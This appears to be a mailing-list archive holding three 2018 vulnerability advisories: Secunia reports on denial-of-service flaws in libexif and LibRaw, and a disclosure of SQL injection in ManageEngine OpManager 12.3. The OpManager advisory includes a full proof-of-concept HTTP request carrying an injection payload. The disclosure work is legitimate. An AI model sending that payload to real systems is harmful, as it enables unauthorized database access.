Secunia Research: libexif EXIF_IFD_INTEROPERABILITY / EXIF_IFD_EXIF Denial of Service Vulnerability

2018-12-17 Thread Secunia Research
==

Secunia Research 2018/12/13

   libexif EXIF_IFD_INTEROPERABILITY / EXIF_IFD_EXIF
  Denial of Service Vulnerability

==
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Flexera8
Verification.9

==
1) Affected Software

*  libexif version  0.6.21. Other versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in libexif, which can
be exploited by malicious people to cause a DoS (Denial of Service).

1) An error when processing the EXIF_IFD_INTEROPERABILITY and
EXIF_IFD_EXIF tags can be exploited to exhaust available CPU
resources.

The vulnerability is confirmed in version 0.6.21. Other versions may
also be affected.

==
4) Solution

No official solution is currently available.

==
5) Time Table

2018/09/12 - Maintainer contacted with the vulnerability details.
2018/09/27 - Maintainer contacted for a follow-up.
2018/09/28 - Maintainer confirmed the vulnerability.
2018/11/13 - Maintainer contacted for a follow-up highlighting
 disclosure policy margins.
2018/12/12 - Release of Secunia Advisory SA84652 based on the
 disclosure policy.
2018/12/13 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-20030 identifier for the vulnerability.

==
8) About Flexera

Flexera  helps  application  producers  and  enterprises  increase
application usage and the value they derive from their software.

http://www.flexera.com

Flexera delivers market-leading Software Vulnerability Management
solutions  enabling  enterprises  to  proactively  identify  and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

https://www.flexera.com/products/software-vulnerability-management

Flexera  supports  and  contributes  to the  community in  several
ways.  We  have  always  believed  that  reliable  vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be freely available for consumers to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated and stay secure. End-users (whether private
individuals or businesses) are otherwise left largely alone, and
that is why back in 2002, Secunia Research started investigating,
coordinating disclosure and verifying software vulnerabilities.
In 2016, Secunia Research became a part of Flexera and today
our in-house software vulnerability research remains the core of
the Software Vulnerability Management products at Flexera.

https://www.flexera.com/company/secunia-research/

The  public Secunia Advisory database  contains  information  for
researchers, security enthusiasts, and consumers to lookup individual
products and vulnerabilities and assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered.

https://www.flexera.com/company/secunia-research/advisories/

==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-28/

Complete list of vulnerability reports published by Secunia Research:
https://www.flexera.com/company/secunia-research/advisories/

==



Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities

2018-12-17 Thread Secunia Research
==

Secunia Research 2018/12/13

 LibRaw Multiple Denial of Service Vulnerabilities

==
Table of Contents

Affected Software1
Severity.2
Description of Vulnerabilities...3
Solution.4
Time Table...5
Credits..6
References...7
About Flexera8
Verification.9

==
1) Affected Software

*  LibRaw versions prior to  0.19.1.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in LibRaw,
which can be exploited by malicious people to  cause a DoS
(Denial of Service).

1) A type confusion error within the "unpacked_load_raw()" function
(internal/dcraw_common.cpp) can be exploited to trigger an infinite
loop.

2) An error within the "parse_rollei()" function
(internal/dcraw_common.cpp) can be exploited to trigger an infinite
loop.

3) An error within the "parse_sinar_ia()" function
(internal/dcraw_common.cpp) can be exploited to exhaust available
CPU resources.

The vulnerabilities are confirmed in version 0.19.0 and reported in
versions prior to 0.19.1.

==
4) Solution

Update to version 0.19.1.

==
5) Time Table

2018/11/22 - Maintainer contacted with the vulnerability details.
2018/11/23 - Maintainer confirmed the vulnerability.
2018/11/23 - Maintainer released a fix.
2018/12/03 - Release of Secunia Advisory SA86384.
2018/12/13 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-5817, CVE-2018-5818, and CVE-2018-5819 identifiers for
the vulnerability.

==
8) About Flexera

Flexera  helps  application  producers  and  enterprises  increase
application usage and the value they derive from their software.

http://www.flexera.com

Flexera delivers market-leading Software Vulnerability Management
solutions  enabling  enterprises  to  proactively  identify  and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

https://www.flexera.com/products/software-vulnerability-management

Flexera  supports  and  contributes  to the  community in  several
ways.  We  have  always  believed  that  reliable  vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be freely available for consumers to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated and stay secure. End-users (whether private
individuals or businesses) are otherwise left largely alone, and
that is why back in 2002, Secunia Research started investigating,
coordinating disclosure and verifying software vulnerabilities.
In 2016, Secunia Research became a part of Flexera and today
our in-house software vulnerability research remains the core of
the Software Vulnerability Management products at Flexera.

https://www.flexera.com/company/secunia-research/

The  public Secunia Advisory database  contains  information  for
researchers, security enthusiasts, and consumers to lookup individual
products and vulnerabilities and assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered.

https://www.flexera.com/company/secunia-research/advisories/

==
9) Verification

Please verify this advisory by visiting the website:
https://www.flexera.com/company/secunia-research/advisories/SR-2018-27.html

Complete list of vulnerability reports published by Secunia Research:
https://www.flexera.com/company/secunia-research/advisories/


Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection via the getGraphData API

2018-12-17 Thread Murat Aydemir
I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection
via the getGraphData API.

II. CVE REFERENCE
-
CVE-2018-20173

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
17/12/2018 OPManager replay that they fixed

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product(version 12.3) was vulnerable to SQL
Injection attacks. A successfully exploit of this attack could allow
arbitrary code execution or unauthenticated access in databases
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
GET 
/api/json/v2/device/getGraphData?name=192.168.252.150=WMI-MemoryUtilization=WMI-MemoryUtilization10376381'%20or%20'11'%3d'11=Today=true=XX&_=1539935355622
HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost.com/apiclient/ember/index.jsp
OPMCurrentRoute:
http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FInventory%2FSnapshot%2FMonitoringDevice%2F192.168.252.150%2FPerfGraph%2FWMI-MemoryUtilization%2FWMI-MemoryUtilization
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=XXX; encryptPassForAutomaticSignin=XXX;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=X;
opmcsrfcookie=X
DNT: 1
Connection: close

-- 









Bu mesaj ve ekleri, mesajda 
gönderildiği belirtilen 
kişi/kişilere özeldir ve gizlidir. Bu mesaj 
herhangi bir amaç için 
çoğaltılamaz, dağıtılamaz ve yayınlanamaz. 
Mesajın gönderildiği kişi 
değilseniz, mesaj içeriğini ya da eklerini 
kopyalamayınız, yayınlamayınız 
ya da başka kişilere yönlendirmeyiniz ve 
mesajı gönderen kişiyi derhal 
uyararak bu mesajı siliniz. Şirketimiz, 
mesajın içeriğinin ve eklerinin 
size değişikliğe uğrayarak veya geç 
ulaşmasından; gizliliğinin 
korunmamasından; virüs içermesinden ve 
bilgisayar sisteminize verebileceği 
herhangi bir zarardan sorumlu 
değildir


This message and its 
attachments 
are confidential and intended solely for the recipient(s) 
stated therein. 
This message cannot be copied, distributed or published 
for any purpose. 
If you are not the intended recipient, please do not 
copy, publish or 
forward the information existing in the content and 
attachments of this 
message. In such case please notify the sender 
immediately and delete all 
the copies of the message. Our company shall 
have no liability for any 
changes in or late receiving of the message, 
loss of integrity and 
confidentiality, viruses and any damages caused in
 anyway to your computer 
system based on this message.